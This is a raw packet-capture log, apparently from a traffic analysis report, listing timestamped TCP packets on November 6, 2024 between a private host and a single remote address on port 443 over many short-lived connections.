                                              Nov 6, 2024 17:03:42.675707102 CET50224443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:42.675862074 CET50224443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:42.675873041 CET4435022413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:42.916517019 CET4435022013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:42.917130947 CET50220443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:42.917180061 CET4435022013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:42.917778015 CET50220443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:42.917783976 CET4435022013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.042124987 CET4435022113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.042645931 CET50221443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.042659998 CET4435022113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.043087959 CET50221443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.043092012 CET4435022113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.046267033 CET4435022013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.046339989 CET4435022013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.046399117 CET50220443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.046561956 CET50220443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.046578884 CET4435022013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.046591043 CET50220443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.046596050 CET4435022013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.049381018 CET50225443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.049426079 CET4435022513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.049515963 CET50225443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.049738884 CET50225443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.049755096 CET4435022513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.174712896 CET4435022213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.175381899 CET50222443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.175398111 CET4435022213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.175837040 CET50222443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.175842047 CET4435022213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.180438995 CET4435022113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.181396961 CET4435022113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.181454897 CET50221443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.181468010 CET4435022113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.181480885 CET4435022113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.181536913 CET50221443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.181591034 CET50221443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.181610107 CET4435022113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.181624889 CET50221443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.181631088 CET4435022113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.184756041 CET50226443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.184788942 CET4435022613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.184870005 CET50226443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.185055971 CET50226443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.185069084 CET4435022613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.282046080 CET4435022313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.282936096 CET50223443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.282957077 CET4435022313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.283544064 CET50223443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.283550024 CET4435022313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.322099924 CET4435022213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.322155952 CET4435022213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.322252989 CET50222443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.322515011 CET50222443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.322527885 CET4435022213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.322540045 CET50222443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.322544098 CET4435022213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.325839996 CET50227443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.325872898 CET4435022713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.325973034 CET50227443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.326224089 CET50227443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.326239109 CET4435022713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.415139914 CET4435022313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.415172100 CET4435022313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.415216923 CET4435022313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.415263891 CET50223443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.415323019 CET50223443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.415584087 CET50223443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.415596008 CET4435022313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.415606976 CET50223443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.415612936 CET4435022313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.418833017 CET50228443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.418857098 CET4435022813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.418953896 CET50228443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.419166088 CET50228443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.419176102 CET4435022813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.423742056 CET4435022413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.424185991 CET50224443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.424210072 CET4435022413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.424616098 CET50224443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.424621105 CET4435022413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.556332111 CET4435022413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.557583094 CET4435022413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.557656050 CET50224443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.561172962 CET50224443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.561212063 CET50224443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.561211109 CET4435022413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.561219931 CET4435022413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.564740896 CET50229443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.564775944 CET4435022913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.564851999 CET50229443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.565187931 CET50229443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.565200090 CET4435022913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.802860975 CET4435022513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.803419113 CET50225443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.803446054 CET4435022513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.804049015 CET50225443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.804054976 CET4435022513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.913881063 CET4435022613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.914468050 CET50226443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.914494991 CET4435022613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.914916039 CET50226443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.914921045 CET4435022613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.937196016 CET4435022513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.937268972 CET4435022513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.937403917 CET50225443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.937769890 CET50225443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.937793016 CET4435022513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.937805891 CET50225443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.937812090 CET4435022513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.940675020 CET50230443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.940710068 CET4435023013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:43.940818071 CET50230443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.941046000 CET50230443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:43.941055059 CET4435023013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.048218012 CET4435022613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.048772097 CET4435022613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.048845053 CET50226443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.048886061 CET50226443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.048903942 CET4435022613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.048913956 CET50226443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.048918962 CET4435022613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.051604986 CET50231443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.051649094 CET4435023113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.051722050 CET50231443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.051861048 CET50231443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.051872015 CET4435023113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.064543962 CET4435022713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.064970016 CET50227443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.064989090 CET4435022713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.065397024 CET50227443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.065402031 CET4435022713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.155884027 CET4435022813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.156291962 CET50228443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.156306982 CET4435022813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.156703949 CET50228443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.156709909 CET4435022813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.197208881 CET4435022713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.197242975 CET4435022713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.197284937 CET4435022713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.197304010 CET50227443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.197329998 CET50227443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.197556973 CET50227443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.197571993 CET4435022713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.197581053 CET50227443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.197586060 CET4435022713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.200388908 CET50232443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.200433969 CET4435023213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.200520039 CET50232443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.200695992 CET50232443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.200712919 CET4435023213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.288646936 CET4435022813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.288737059 CET4435022813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.288800001 CET50228443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.288965940 CET50228443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.288981915 CET4435022813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.288991928 CET50228443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.288996935 CET4435022813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.291680098 CET50233443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.291723013 CET4435023313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.291817904 CET50233443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.291974068 CET50233443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.291985989 CET4435023313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.296304941 CET4435022913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.296689987 CET50229443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.296711922 CET4435022913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.297137976 CET50229443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.297143936 CET4435022913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.427364111 CET4435022913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.427834034 CET4435022913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.427911997 CET50229443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.427968025 CET50229443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.427984953 CET4435022913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.428002119 CET50229443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.428005934 CET4435022913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.430653095 CET50234443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.430699110 CET4435023413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.430775881 CET50234443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.430907965 CET50234443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.430917978 CET4435023413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.686019897 CET4435023013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.686547995 CET50230443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.686558008 CET4435023013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.687005043 CET50230443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.687009096 CET4435023013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.771219015 CET4435023113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.771806955 CET50231443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.771828890 CET4435023113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.772283077 CET50231443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.772289038 CET4435023113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.817745924 CET4435023013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.817819118 CET4435023013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.817878962 CET50230443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.818053961 CET50230443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.818067074 CET4435023013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.818078041 CET50230443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.818083048 CET4435023013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.820883036 CET50235443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.820925951 CET4435023513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.821002007 CET50235443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.821258068 CET50235443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.821270943 CET4435023513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.900547028 CET4435023113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.900629997 CET4435023113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.900676966 CET50231443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.900881052 CET50231443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.900892019 CET4435023113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.900903940 CET50231443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.900908947 CET4435023113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.904020071 CET50236443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.904069901 CET4435023613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.904166937 CET50236443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.904366970 CET50236443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.904386044 CET4435023613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.940732002 CET4435023213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.941585064 CET50232443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.941606045 CET4435023213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:44.942060947 CET50232443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:44.942069054 CET4435023213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:45.014830112 CET4435023313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:45.018285990 CET50233443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:45.018313885 CET4435023313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:45.018743992 CET50233443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:45.018748045 CET4435023313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:45.071850061 CET4435023213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:45.072262049 CET4435023213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:45.072328091 CET50232443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:45.072360992 CET50232443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:45.072379112 CET4435023213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:45.072387934 CET50232443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:45.072396040 CET4435023213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:45.075009108 CET50237443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:45.075048923 CET4435023713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:45.075114012 CET50237443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:45.075244904 CET50237443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:45.075258970 CET4435023713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:45.147217035 CET4435023313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:45.147309065 CET4435023313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:45.147378922 CET50233443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:45.147564888 CET50233443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:45.147587061 CET4435023313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:45.147603035 CET50233443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:45.147608995 CET4435023313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:45.150441885 CET50238443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:45.150477886 CET4435023813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:45.150552034 CET50238443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:45.150744915 CET50238443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:45.150757074 CET4435023813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:45.178962946 CET4435023413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:45.179820061 CET50234443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:45.179820061 CET50234443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:45.179831028 CET4435023413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:45.179846048 CET4435023413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:45.312815905 CET4435023413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:45.312882900 CET4435023413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:45.312937975 CET50234443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:45.313126087 CET50234443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:45.313139915 CET4435023413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:45.313148975 CET50234443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:45.313153982 CET4435023413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:45.316010952 CET50239443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:45.316051960 CET4435023913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:45.316140890 CET50239443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:45.316304922 CET50239443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:45.316318035 CET4435023913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:46.261387110 CET4435023513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:46.261955976 CET50235443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:46.261987925 CET4435023513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:46.262391090 CET50235443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:46.262397051 CET4435023513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:46.264997959 CET4435023613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:46.265288115 CET50236443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:46.265310049 CET4435023613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:46.265712023 CET50236443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:46.265716076 CET4435023613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:46.395553112 CET4435023513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:46.395584106 CET4435023513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:46.395627975 CET50235443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:46.395631075 CET4435023513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:46.395673990 CET50235443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:46.395895958 CET50235443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:46.395919085 CET4435023513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:46.395929098 CET50235443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:46.395935059 CET4435023513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:46.398752928 CET50240443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:46.398799896 CET4435024013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:46.398868084 CET50240443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:46.399027109 CET50240443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:46.399044037 CET4435024013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:46.401418924 CET4435023613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:46.401495934 CET4435023613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:46.401587009 CET50236443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:46.401587009 CET50236443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:46.401621103 CET50236443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:46.401638031 CET4435023613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:46.403583050 CET50241443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:46.403614998 CET4435024113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:46.403682947 CET50241443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:46.403851986 CET50241443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:46.403862953 CET4435024113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:46.406666994 CET4435023713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:46.406683922 CET4435023813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:46.407094002 CET50238443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:46.407109976 CET4435023813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:46.407495022 CET50238443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:46.407501936 CET4435023813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:46.407582998 CET50237443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:46.407593012 CET4435023713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:46.407932997 CET50237443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:46.407938004 CET4435023713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:46.410614967 CET4435023913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:46.410890102 CET50239443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:46.410903931 CET4435023913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:46.411274910 CET50239443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:46.411278963 CET4435023913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:46.536864042 CET4435023813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:46.536967039 CET4435023813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:46.537113905 CET50238443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:46.537271023 CET50238443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:46.537292957 CET4435023813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:46.537302017 CET50238443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:46.537309885 CET4435023813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:46.537487984 CET4435023713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:46.537770033 CET4435023713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:46.537808895 CET4435023713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:46.537827969 CET50237443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:46.537861109 CET50237443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:46.537910938 CET50237443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:46.537910938 CET50237443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:46.537930965 CET4435023713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:46.537940025 CET4435023713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:46.540287971 CET50242443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:46.540313005 CET4435024213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:46.540333033 CET50243443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:46.540361881 CET4435024313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:46.540380955 CET50242443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:46.540416956 CET50243443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:46.540513992 CET50242443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:46.540528059 CET4435024213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:46.540606022 CET50243443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:46.540617943 CET4435024313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:46.543740988 CET4435023913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:46.543771982 CET4435023913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:46.543807030 CET4435023913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:46.543816090 CET50239443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:46.543850899 CET50239443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:46.543975115 CET50239443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:46.543979883 CET4435023913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:46.543988943 CET50239443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:46.543992996 CET4435023913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:46.545826912 CET50244443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:46.545877934 CET4435024413.107.246.45192.168.2.6
